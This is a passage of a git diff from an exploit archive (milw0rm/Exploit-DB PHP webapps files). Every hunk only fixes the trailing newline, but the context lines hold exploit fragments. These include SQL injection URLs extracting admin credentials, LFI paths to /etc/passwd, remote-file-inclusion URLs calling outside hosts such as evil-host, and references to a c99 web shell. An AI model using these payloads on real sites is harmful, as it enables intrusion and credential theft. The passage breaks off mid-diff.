\ No newline at end of file diff --git a/platforms/php/webapps/5649.pl b/platforms/php/webapps/5649.pl index 80b110ee4..69ee8a210 100755 --- a/platforms/php/webapps/5649.pl +++ b/platforms/php/webapps/5649.pl @@ -30,4 +30,4 @@ if($ob->is_success && index($ob->content, "registered") != -1) { print "Exploit Successfull! Admin Created! Login: $url\n"; } else { print "Failed. Cause's: username exists or site not vulnerable, try again!"; } -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/565.txt b/platforms/php/webapps/565.txt index 1a9c04b3f..f6e8ad008 100755 --- a/platforms/php/webapps/565.txt +++ b/platforms/php/webapps/565.txt @@ -15,4 +15,4 @@ What Happened? The 3rd line of exploit.html injected Administrator level "1" into the database file. ( 1: Administrator,2: is Normal User. ) -# milw0rm.com [2004-09-30] +# milw0rm.com [2004-09-30] \ No newline at end of file diff --git a/platforms/php/webapps/5650.pl b/platforms/php/webapps/5650.pl index 47f395e82..7c134cd00 100755 --- a/platforms/php/webapps/5650.pl +++ b/platforms/php/webapps/5650.pl @@ -30,4 +30,4 @@ if($ob->is_success && index($ob->content, "added") != -1) { print "\nAdmin Account Added! Login at: ".$url."\n"; } else { print "\nExploit Failed! username already exists?"; } -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5651.txt b/platforms/php/webapps/5651.txt index 988b77367..4ebca1aba 100755 --- a/platforms/php/webapps/5651.txt +++ b/platforms/php/webapps/5651.txt @@ -17,4 +17,4 @@ ## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php ## =============================================================== -# milw0rm.com [2008-05-19] +# milw0rm.com [2008-05-19] \ No newline at end of file diff --git a/platforms/php/webapps/5652.pl b/platforms/php/webapps/5652.pl index 16f9cb331..5a8f02eca 100755 --- a/platforms/php/webapps/5652.pl +++ b/platforms/php/webapps/5652.pl @@ -74,4 +74,4 @@ else{print "\n[-] Exploit Failed...\n";} #-------------------Exploit exploited by Stack-Terrorist --------------------# ######################################## -# milw0rm.com [2008-05-19] +# milw0rm.com [2008-05-19] \ No newline at end of file diff --git a/platforms/php/webapps/5653.php b/platforms/php/webapps/5653.php index 1ee4d1287..5f8874647 100755 --- a/platforms/php/webapps/5653.php +++ b/platforms/php/webapps/5653.php @@ -219,4 +219,4 @@ else print "\n\n[-] Successfull!\n"; ?> -# milw0rm.com [2008-05-19] +# milw0rm.com [2008-05-19] \ No newline at end of file diff --git a/platforms/php/webapps/5654.txt b/platforms/php/webapps/5654.txt index 178edc748..e71e07929 100755 --- a/platforms/php/webapps/5654.txt +++ b/platforms/php/webapps/5654.txt @@ -43,4 +43,4 @@ http://demo.fastfreemedia.com/play.php?id=-96969+union+select+0x28284d722e53514c ########################################################################## -((:::: Geek Inj3cT0r ::::))- -# milw0rm.com [2008-05-19] +# milw0rm.com [2008-05-19] \ No newline at end of file diff --git a/platforms/php/webapps/5655.pl b/platforms/php/webapps/5655.pl index d51d8ee33..478e78480 100755 --- a/platforms/php/webapps/5655.pl +++ b/platforms/php/webapps/5655.pl @@ -129,4 +129,4 @@ $cmd = ; #----------------------Exploited by : Stack-Terrorist [v40]-----------------# ######################################## -# milw0rm.com [2008-05-20] +# milw0rm.com [2008-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/5656.txt b/platforms/php/webapps/5656.txt index f31d0c6d9..cb738846c 100755 --- a/platforms/php/webapps/5656.txt +++ b/platforms/php/webapps/5656.txt @@ -56,4 +56,4 @@ now see the "editCss.php" and edit the cms CSS :D ----- young iranian h4ck3rz -# milw0rm.com [2008-05-20] +# milw0rm.com [2008-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/5657.txt b/platforms/php/webapps/5657.txt index f7707f9cb..384b369c4 100755 --- a/platforms/php/webapps/5657.txt +++ b/platforms/php/webapps/5657.txt @@ -216,4 +216,4 @@ author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -# milw0rm.com [2008-05-20] +# milw0rm.com [2008-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/5658.txt b/platforms/php/webapps/5658.txt index 50d67d04e..76b16df84 100755 --- a/platforms/php/webapps/5658.txt +++ b/platforms/php/webapps/5658.txt @@ -28,4 +28,4 @@ Greetz: dun - sid_psycho - Kacper ########################################################### -# milw0rm.com [2008-05-20] +# milw0rm.com [2008-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/5659.txt b/platforms/php/webapps/5659.txt index f3f98662a..4d95864cc 100755 --- a/platforms/php/webapps/5659.txt +++ b/platforms/php/webapps/5659.txt @@ -10,4 +10,4 @@ PoC : SQL query will generate error page containing requested informations. -# milw0rm.com [2008-05-20] +# milw0rm.com [2008-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/5660.txt b/platforms/php/webapps/5660.txt index fe178397d..72d6cf55f 100755 --- a/platforms/php/webapps/5660.txt +++ b/platforms/php/webapps/5660.txt @@ -62,4 +62,4 @@ <<->> All muslims -# milw0rm.com [2008-05-20] +# milw0rm.com [2008-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/5661.txt b/platforms/php/webapps/5661.txt index a8a12e7d5..7e68b68ef 100755 --- a/platforms/php/webapps/5661.txt +++ b/platforms/php/webapps/5661.txt @@ -34,4 +34,4 @@ Vulnerability: http://localhost/netious/index.php?pageid='/**/union/**/select/** -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-21] +# milw0rm.com [2008-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/5663.txt b/platforms/php/webapps/5663.txt index 93811017b..4ad83ecc5 100755 --- a/platforms/php/webapps/5663.txt +++ b/platforms/php/webapps/5663.txt @@ -33,4 +33,4 @@ Greetz: All IRAQI And all HACKER ########################################################### -# milw0rm.com [2008-05-21] +# milw0rm.com [2008-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/5664.txt b/platforms/php/webapps/5664.txt index dad96d1f9..3b3b58d3a 100755 --- a/platforms/php/webapps/5664.txt +++ b/platforms/php/webapps/5664.txt @@ -60,4 +60,4 @@ version (4) http://www.simpelside.dk/web4/index2.php?id=-1+union+select+1,conca ######################################################################################### -(:::: Geek Inj3cT0r ::::)- -# milw0rm.com [2008-05-21] +# milw0rm.com [2008-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/5665.txt b/platforms/php/webapps/5665.txt index ec4119735..30a74e857 100755 --- a/platforms/php/webapps/5665.txt +++ b/platforms/php/webapps/5665.txt @@ -80,4 +80,4 @@ version number [4] ################################################################################### -(:::: Geek Inj3cT0r ::::)- -# milw0rm.com [2008-05-21] +# milw0rm.com [2008-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/5666.txt b/platforms/php/webapps/5666.txt index 4f97639fb..8ab6a85f6 100755 --- a/platforms/php/webapps/5666.txt +++ b/platforms/php/webapps/5666.txt @@ -41,4 +41,4 @@ http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substrin --- young iranian h4ck3rz -# milw0rm.com [2008-05-22] +# milw0rm.com [2008-05-22] \ No newline at end of file diff --git a/platforms/php/webapps/5668.txt b/platforms/php/webapps/5668.txt index aa0d785e2..8591b9f13 100755 --- a/platforms/php/webapps/5668.txt +++ b/platforms/php/webapps/5668.txt @@ -128,4 +128,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-05-23] +# milw0rm.com [2008-05-23] \ No newline at end of file diff --git a/platforms/php/webapps/5669.txt b/platforms/php/webapps/5669.txt index ded124117..17f2fda71 100755 --- a/platforms/php/webapps/5669.txt +++ b/platforms/php/webapps/5669.txt @@ -57,4 +57,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-05-23] +# milw0rm.com [2008-05-23] \ No newline at end of file diff --git a/platforms/php/webapps/5670.txt b/platforms/php/webapps/5670.txt index b7f9e33c1..4d8f476f5 100755 --- a/platforms/php/webapps/5670.txt +++ b/platforms/php/webapps/5670.txt @@ -10,4 +10,4 @@ http://localhost/[script_path]/resaopen.php?idresa=-1 UNION SELECT 1,2,3,4,5,6,concat(LoginUs,0x3a,PwdUs),8,9 FROM rp_user where IdUs=1-- ############################################ -# milw0rm.com [2008-05-24] +# milw0rm.com [2008-05-24] \ No newline at end of file diff --git a/platforms/php/webapps/5671.txt b/platforms/php/webapps/5671.txt index fdd36b85f..1da43f8d1 100755 --- a/platforms/php/webapps/5671.txt +++ b/platforms/php/webapps/5671.txt @@ -32,4 +32,4 @@ www.site.com/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_ < -- bug code end of -- > -# milw0rm.com [2008-05-24] +# milw0rm.com [2008-05-24] \ No newline at end of file diff --git a/platforms/php/webapps/5672.txt b/platforms/php/webapps/5672.txt index 364e09357..5c357b85e 100755 --- a/platforms/php/webapps/5672.txt +++ b/platforms/php/webapps/5672.txt @@ -7,4 +7,4 @@ Example; http://localhost/plus.php?_pages_dir=http://SH3LL? <--------------------Milw0rm Exploits--------------------> -# milw0rm.com [2008-05-25] +# milw0rm.com [2008-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/5673.txt b/platforms/php/webapps/5673.txt index 221478725..3593e5cbf 100755 --- a/platforms/php/webapps/5673.txt +++ b/platforms/php/webapps/5673.txt @@ -31,4 +31,4 @@ [!] PoC LFI....: http://127.0.0.1/xomol/index.php?op=../../../../../../../../../../etc/passwd%00 -# milw0rm.com [2008-05-25] +# milw0rm.com [2008-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/5674.txt b/platforms/php/webapps/5674.txt index cdc1397be..762b5d352 100755 --- a/platforms/php/webapps/5674.txt +++ b/platforms/php/webapps/5674.txt @@ -61,4 +61,4 @@ EXPLOIT HTML : GREETZ: http://real-hack.com ----------------------------------------------------------------------------- -# milw0rm.com [2008-05-26] +# milw0rm.com [2008-05-26] \ No newline at end of file diff --git a/platforms/php/webapps/5675.txt b/platforms/php/webapps/5675.txt index 765675bf1..c206e139d 100755 --- a/platforms/php/webapps/5675.txt +++ b/platforms/php/webapps/5675.txt @@ -44,4 +44,4 @@ http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x --- young iranian h4ck3rz -# milw0rm.com [2008-05-26] +# milw0rm.com [2008-05-26] \ No newline at end of file diff --git a/platforms/php/webapps/5676.txt b/platforms/php/webapps/5676.txt index 4617b0c0d..e02fef156 100755 --- a/platforms/php/webapps/5676.txt +++ b/platforms/php/webapps/5676.txt @@ -23,4 +23,4 @@ CMS MAXSITE Remote SQL Injection Exploit <= 1.10 ########################################################################### -# milw0rm.com [2008-05-26] +# milw0rm.com [2008-05-26] \ No newline at end of file diff --git a/platforms/php/webapps/5677.txt b/platforms/php/webapps/5677.txt index f9f502396..a222b415b 100755 --- a/platforms/php/webapps/5677.txt +++ b/platforms/php/webapps/5677.txt @@ -108,4 +108,4 @@ Title Author Replies Visits Last post #=================================================================================================# """ -# milw0rm.com [2008-05-27] +# milw0rm.com [2008-05-27] \ No newline at end of file diff --git a/platforms/php/webapps/5678.txt b/platforms/php/webapps/5678.txt index 7c8eb2b65..42b891223 100755 --- a/platforms/php/webapps/5678.txt +++ b/platforms/php/webapps/5678.txt @@ -17,4 +17,4 @@ Greatz : aLL My Friendz & Coderx & Code Hunters & str0ke ------- -# milw0rm.com [2008-05-27] +# milw0rm.com [2008-05-27] \ No newline at end of file diff --git a/platforms/php/webapps/5680.txt b/platforms/php/webapps/5680.txt index c7f841cdc..2e98574a1 100755 --- a/platforms/php/webapps/5680.txt +++ b/platforms/php/webapps/5680.txt @@ -13,4 +13,4 @@ http://localhost/otomigenx/library_rss.php?lang=../../etc/passwd http://kmrg.itb.ac.id/otomigenx/library_rss.php?lang=../../../../../etc/passwd [+] Notes: Don, hows the threaded version going? lololol ( javascript:alert('noob'); ) or should it be plain xss? LOLOL -# milw0rm.com [2008-05-27] +# milw0rm.com [2008-05-27] \ No newline at end of file diff --git a/platforms/php/webapps/5683.txt b/platforms/php/webapps/5683.txt index af204f1f9..580b9d008 100755 --- a/platforms/php/webapps/5683.txt +++ b/platforms/php/webapps/5683.txt @@ -20,4 +20,4 @@ Proof of Concept : # ############################################################################### -# milw0rm.com [2008-05-28] +# milw0rm.com [2008-05-28] \ No newline at end of file diff --git a/platforms/php/webapps/5684.txt b/platforms/php/webapps/5684.txt index 7b7b950e4..4ed88bb5f 100755 --- a/platforms/php/webapps/5684.txt +++ b/platforms/php/webapps/5684.txt @@ -14,4 +14,4 @@ gretZ : aLL My Friends & CoderX Federation & Code Hunters and str0ke ----------------------------- -# milw0rm.com [2008-05-28] +# milw0rm.com [2008-05-28] \ No newline at end of file diff --git a/platforms/php/webapps/5685.txt b/platforms/php/webapps/5685.txt index 07b9e3cfe..d00b86496 100755 --- a/platforms/php/webapps/5685.txt +++ b/platforms/php/webapps/5685.txt @@ -24,4 +24,4 @@ The colums from host to host are diferent: all resolve =D # ############################################################################### -# milw0rm.com [2008-05-28] +# milw0rm.com [2008-05-28] \ No newline at end of file diff --git a/platforms/php/webapps/5688.php b/platforms/php/webapps/5688.php index 1a9816eb7..4485f3f40 100755 --- a/platforms/php/webapps/5688.php +++ b/platforms/php/webapps/5688.php @@ -141,4 +141,4 @@ while(1) } ?> -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5689.txt b/platforms/php/webapps/5689.txt index 059f83d4e..6fea74b68 100755 --- a/platforms/php/webapps/5689.txt +++ b/platforms/php/webapps/5689.txt @@ -31,4 +31,4 @@ Note : Some site used SELECT statements have a different number of columns about -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5690.txt b/platforms/php/webapps/5690.txt index 90f27043a..01d185eb4 100755 --- a/platforms/php/webapps/5690.txt +++ b/platforms/php/webapps/5690.txt @@ -28,4 +28,4 @@ http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini http://127.0.0.1/path/index.php?pagina=[file] -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5691.php b/platforms/php/webapps/5691.php index 17b8dff19..74e8de97e 100755 --- a/platforms/php/webapps/5691.php +++ b/platforms/php/webapps/5691.php @@ -130,4 +130,4 @@ while(1) ?> -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5692.pl b/platforms/php/webapps/5692.pl index 75c60741f..80168cafa 100755 --- a/platforms/php/webapps/5692.pl +++ b/platforms/php/webapps/5692.pl @@ -61,4 +61,4 @@ if ($answer =~/91a343c02e6c4e10b023216ecfcd69e7/){print "[+] md5 cracked :".$pas # codec by Houssamix From H-T Team # special thx to : StaCk -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5693.txt b/platforms/php/webapps/5693.txt index 2cf4ca9fc..ccedc1c94 100755 --- a/platforms/php/webapps/5693.txt +++ b/platforms/php/webapps/5693.txt @@ -27,4 +27,4 @@ Exploit 2 : thx : allah -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5696.pl b/platforms/php/webapps/5696.pl index 92cba4ac9..5ab37d246 100755 --- a/platforms/php/webapps/5696.pl +++ b/platforms/php/webapps/5696.pl @@ -76,4 +76,4 @@ else{print "\n[-] Exploit Failed...\n";} #-------------------Exploit exploited by Stack --------------------# ######################################## -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5697.php b/platforms/php/webapps/5697.php index 73b0b32cb..f586eb875 100755 --- a/platforms/php/webapps/5697.php +++ b/platforms/php/webapps/5697.php @@ -134,4 +134,4 @@ while(1) } ?> -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/php/webapps/5698.txt b/platforms/php/webapps/5698.txt index 391bedcde..ffc1981d4 100755 --- a/platforms/php/webapps/5698.txt +++ b/platforms/php/webapps/5698.txt @@ -89,4 +89,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-05-30] +# milw0rm.com [2008-05-30] \ No newline at end of file diff --git a/platforms/php/webapps/5699.txt b/platforms/php/webapps/5699.txt index a896f8eb8..5f41d3c80 100755 --- a/platforms/php/webapps/5699.txt +++ b/platforms/php/webapps/5699.txt @@ -97,4 +97,4 @@ n0te :: The Script have diffrent Versions you can get the source and search for ############################################################################# -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/570.txt b/platforms/php/webapps/570.txt index c9f823959..7fae7acab 100755 --- a/platforms/php/webapps/570.txt +++ b/platforms/php/webapps/570.txt @@ -85,4 +85,4 @@ check(loc:dir); } -# milw0rm.com [2004-10-10] +# milw0rm.com [2004-10-10] \ No newline at end of file diff --git a/platforms/php/webapps/5700.htm b/platforms/php/webapps/5700.htm index 6b90f808c..8405a2463 100755 --- a/platforms/php/webapps/5700.htm +++ b/platforms/php/webapps/5700.htm @@ -24,4 +24,4 @@ Arbitrary File Upload (into http://[host]/[path]/downloads/ ): -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5701.txt b/platforms/php/webapps/5701.txt index 98c035df2..5f25e0a7c 100755 --- a/platforms/php/webapps/5701.txt +++ b/platforms/php/webapps/5701.txt @@ -44,4 +44,4 @@ www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,passw < -- bug SQL End -- > -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5702.txt b/platforms/php/webapps/5702.txt index 2e307c304..45c37326b 100755 --- a/platforms/php/webapps/5702.txt +++ b/platforms/php/webapps/5702.txt @@ -36,4 +36,4 @@ # ############################################################### -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5703.txt b/platforms/php/webapps/5703.txt index 172518a9b..49a1de66e 100755 --- a/platforms/php/webapps/5703.txt +++ b/platforms/php/webapps/5703.txt @@ -25,4 +25,4 @@ # ############################################################### -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5704.txt b/platforms/php/webapps/5704.txt index 21b5301ca..58d6e18f6 100755 --- a/platforms/php/webapps/5704.txt +++ b/platforms/php/webapps/5704.txt @@ -7,4 +7,4 @@ http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../.. author:mozi2weed@yahoo.com http://rstzone.org -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5706.php b/platforms/php/webapps/5706.php index 09b0c8c67..9d357aca5 100755 --- a/platforms/php/webapps/5706.php +++ b/platforms/php/webapps/5706.php @@ -52,4 +52,4 @@ echo "\nNot enough arguments!\n"; } ?> -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5707.txt b/platforms/php/webapps/5707.txt index 889007ceb..72dd9a6d7 100755 --- a/platforms/php/webapps/5707.txt +++ b/platforms/php/webapps/5707.txt @@ -39,4 +39,4 @@ http://target/path/social_game_play.php?path=http://Evil-script? #The majority of the versions are infected -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5708.txt b/platforms/php/webapps/5708.txt index b78c25de8..04558d82b 100755 --- a/platforms/php/webapps/5708.txt +++ b/platforms/php/webapps/5708.txt @@ -19,4 +19,4 @@ [*] Greetings : Str0ke, all friends & muslims HaCkeRs... [*] Greetings2 : http://www.palcastle.org/cc -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5710.pl b/platforms/php/webapps/5710.pl index 67381a8ac..061718af5 100755 --- a/platforms/php/webapps/5710.pl +++ b/platforms/php/webapps/5710.pl @@ -76,4 +76,4 @@ else{print "\n[-] Exploit Failed...\n";} #-------------------Exploit exploited by Stack --------------------# ######################################## -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/php/webapps/5711.txt b/platforms/php/webapps/5711.txt index fafc9f924..b11f4e6d0 100755 --- a/platforms/php/webapps/5711.txt +++ b/platforms/php/webapps/5711.txt @@ -31,4 +31,4 @@ http://target/path/filedload.php?file=filedload.php http://target/path/webadmin/download.php?file=download.php http://target/path/webadmin/download_file.php -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/5713.txt b/platforms/php/webapps/5713.txt index 1e0b37f02..353ac5686 100755 --- a/platforms/php/webapps/5713.txt +++ b/platforms/php/webapps/5713.txt @@ -27,4 +27,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/5714.pl b/platforms/php/webapps/5714.pl index 1dd0240ff..7e9e1f8d9 100755 --- a/platforms/php/webapps/5714.pl +++ b/platforms/php/webapps/5714.pl @@ -109,4 +109,4 @@ sub istrue2 } -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/5715.txt b/platforms/php/webapps/5715.txt index ac563720a..b3ffe2cf8 100755 --- a/platforms/php/webapps/5715.txt +++ b/platforms/php/webapps/5715.txt @@ -10,4 +10,4 @@ http://127.0.0.1/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_pat http://127.0.0.1/DON3/applications/frontpage.don3app/frontpage.php?app_path=SH3LL? ========================================================================================= -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/5716.txt b/platforms/php/webapps/5716.txt index 6f3ae7198..233ec434a 100755 --- a/platforms/php/webapps/5716.txt +++ b/platforms/php/webapps/5716.txt @@ -61,4 +61,4 @@ http://[target]/[path]/search_mask.inc.php?LabelYear= # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/5719.pl b/platforms/php/webapps/5719.pl index 11027e97f..b92bce0d5 100755 --- a/platforms/php/webapps/5719.pl +++ b/platforms/php/webapps/5719.pl @@ -108,4 +108,4 @@ sub istrue2 } -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/5721.pl b/platforms/php/webapps/5721.pl index 71fc8eaf1..685631cc8 100755 --- a/platforms/php/webapps/5721.pl +++ b/platforms/php/webapps/5721.pl @@ -108,4 +108,4 @@ sub istrue2 } -# milw0rm.com [2008-06-02] +# milw0rm.com [2008-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/5722.txt b/platforms/php/webapps/5722.txt index be7ac5814..21e2e141c 100755 --- a/platforms/php/webapps/5722.txt +++ b/platforms/php/webapps/5722.txt @@ -29,4 +29,4 @@ Proof Of Concept RFI: http://localhost/path/templates/barrel/template.tpl.php?re regards> ph03n1xbroc / zuh_runezz / sara / sirzion / ov / mozi / picolo_elfo / -# milw0rm.com [2008-06-02] +# milw0rm.com [2008-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/5723.txt b/platforms/php/webapps/5723.txt index f7d0e204b..3563d91d8 100755 --- a/platforms/php/webapps/5723.txt +++ b/platforms/php/webapps/5723.txt @@ -17,4 +17,4 @@ ---------------------------------------------------------------------------- [*] Greetings : Str0ke, all friends & muslims HaCkeRs... -# milw0rm.com [2008-06-02] +# milw0rm.com [2008-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/5724.txt b/platforms/php/webapps/5724.txt index 138adecef..25c394b75 100755 --- a/platforms/php/webapps/5724.txt +++ b/platforms/php/webapps/5724.txt @@ -12,4 +12,4 @@ Greatz : Cr@zy_King & BLasTer & DarKxBoyZ & Rmx & TR_ip & str0ke ----------- -# milw0rm.com [2008-06-02] +# milw0rm.com [2008-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/5725.txt b/platforms/php/webapps/5725.txt index a613ec2c9..a9d57cfc7 100755 --- a/platforms/php/webapps/5725.txt +++ b/platforms/php/webapps/5725.txt @@ -62,4 +62,4 @@ http://[target]/[path]/order.php?new_s= # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-02] +# milw0rm.com [2008-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/5728.txt b/platforms/php/webapps/5728.txt index 93f61f8b3..b070636a7 100755 --- a/platforms/php/webapps/5728.txt +++ b/platforms/php/webapps/5728.txt @@ -12,4 +12,4 @@ http://[site.com]/tus_imagenes/c99.php ==>>> your address Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/5729.txt b/platforms/php/webapps/5729.txt index e1108830a..d68666043 100755 --- a/platforms/php/webapps/5729.txt +++ b/platforms/php/webapps/5729.txt @@ -29,4 +29,4 @@ [*] Example: /index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users-- ######################################## -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/5730.txt b/platforms/php/webapps/5730.txt index 3f35e5613..b7d83ed00 100755 --- a/platforms/php/webapps/5730.txt +++ b/platforms/php/webapps/5730.txt @@ -27,4 +27,4 @@ ######################################## -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/5731.txt b/platforms/php/webapps/5731.txt index d578293f6..92880cb7b 100755 --- a/platforms/php/webapps/5731.txt +++ b/platforms/php/webapps/5731.txt @@ -33,4 +33,4 @@ [+] GrEEtZ : allah , hak3r-b0y , UnderZ0ne Crew , InjEct0rS Team -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/5733.txt b/platforms/php/webapps/5733.txt index 59c2a5be5..c8797b41c 100755 --- a/platforms/php/webapps/5733.txt +++ b/platforms/php/webapps/5733.txt @@ -181,4 +181,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/5734.pl b/platforms/php/webapps/5734.pl index b5569aaca..c642b4e5f 100755 --- a/platforms/php/webapps/5734.pl +++ b/platforms/php/webapps/5734.pl @@ -107,4 +107,4 @@ sub istrue2 } -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/5736.txt b/platforms/php/webapps/5736.txt index 6735f0867..bc204e7fa 100755 --- a/platforms/php/webapps/5736.txt +++ b/platforms/php/webapps/5736.txt @@ -59,4 +59,4 @@ jalikom@hotmail.fr and this a news bug remote code execution -# milw0rm.com [2008-06-03] +# milw0rm.com [2008-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/5737.pl b/platforms/php/webapps/5737.pl index d9d2101b5..579ab9e89 100755 --- a/platforms/php/webapps/5737.pl +++ b/platforms/php/webapps/5737.pl @@ -106,4 +106,4 @@ sub istrue2 } -# milw0rm.com [2008-06-04] +# milw0rm.com [2008-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/5739.txt b/platforms/php/webapps/5739.txt index b9b31b175..759f34767 100755 --- a/platforms/php/webapps/5739.txt +++ b/platforms/php/webapps/5739.txt @@ -78,4 +78,4 @@ http://[target]/[path]/index.php?group= # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-04] +# milw0rm.com [2008-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/574.txt b/platforms/php/webapps/574.txt index e7a18fedc..df6186509 100755 --- a/platforms/php/webapps/574.txt +++ b/platforms/php/webapps/574.txt @@ -33,4 +33,4 @@ Example of funcs.php if your host doesn't support php. http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls -# milw0rm.com [2004-10-13] +# milw0rm.com [2004-10-13] \ No newline at end of file diff --git a/platforms/php/webapps/5740.pl b/platforms/php/webapps/5740.pl index b2c6d6c6f..dfaa11bc6 100755 --- a/platforms/php/webapps/5740.pl +++ b/platforms/php/webapps/5740.pl @@ -40,4 +40,4 @@ print $socket "POST /index.php HTTP/1.0\n". } die ("Exploit failed!"); -# milw0rm.com [2008-06-04] +# milw0rm.com [2008-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/5742.txt b/platforms/php/webapps/5742.txt index 824f1b7f1..d0439b3f1 100755 --- a/platforms/php/webapps/5742.txt +++ b/platforms/php/webapps/5742.txt @@ -75,4 +75,4 @@ http://[target]/[path]/search.php # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/5743.txt b/platforms/php/webapps/5743.txt index c18d2f63e..035a0ba12 100755 --- a/platforms/php/webapps/5743.txt +++ 